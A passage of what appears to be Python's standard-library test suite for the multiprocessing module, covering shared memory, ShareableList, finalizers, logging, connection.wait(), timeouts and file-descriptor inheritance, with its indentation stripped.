foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Verify __repr__
self.assertIn(sms.name, str(sms))
self.assertIn(str(sms.size), str(sms))
# Test pickling
sms.buf[0:6] = b'pickle'
pickled_sms = pickle.dumps(sms)
sms2 = pickle.loads(pickled_sms)
self.assertEqual(sms.name, sms2.name)
self.assertEqual(sms.size, sms2.size)
self.assertEqual(bytes(sms.buf[0:6]), bytes(sms2.buf[0:6]), b'pickle')
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
        # Creating a shared memory segment with a negative size must fail.
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
        # Attaching to a shared memory segment without a name must fail.
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
        # Test that the shared memory segment is created properly when
        # _make_filename returns the name of an existing segment.
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
            # Prepend NAME_PREFIX, which can be '/psm_' or 'wnsm_'; this is
            # necessary because some POSIX-compliant systems require the
            # name to start with '/'.
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
            # POSIX shared memory can only be unlinked once.  Here we
            # test an implementation detail that is not observed across
            # all supported platforms (since WindowsNamedSharedMemory
            # manages unlinking on its own and unlink() does nothing).
            # True release of a shared memory segment does not necessarily
            # happen until the process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
            # Note: Using a smaller size could possibly cause truncation of
            # the existing segment, but this is OS-platform dependent.  On
            # macOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
        # bpo-40135: don't specify the shared memory block's name, so that
        # parallel multiprocessing test runs cannot collide on it.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
        # The manager's server should ignore KeyboardInterrupt signals,
        # maintain its connection with the current process, and succeed
        # when asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
            # Calls to unlink() have no effect on the Windows platform;
            # shared memory is only released once the final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify __repr__
self.assertIn(sl.shm.name, str(sl))
self.assertIn(str(list(sl)), str(sl))
# Index Out of Range (get)
with self.assertRaises(IndexError):
sl[7]
# Index Out of Range (set)
with self.assertRaises(IndexError):
sl[7] = 2
# Assign value without format change (str -> str)
current_format = sl._get_packing_format(0)
sl[0] = 'howdy'
self.assertEqual(current_format, sl._get_packing_format(0))
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
        self.assertEqual(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
            # Abruptly killing a process that holds a reference to a shared
            # memory segment should not leak that segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
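# Tests for util.Finalize and the finalizer registry.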
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with threading_helper.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(glob.escape(folder), '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
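# Minimal file-like object whose write cache is kept per-process (see the
# pid check in the cache property); used by TestStdinBadfiledescriptor below.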
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
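# Tests for multiprocessing.connection.wait().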
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
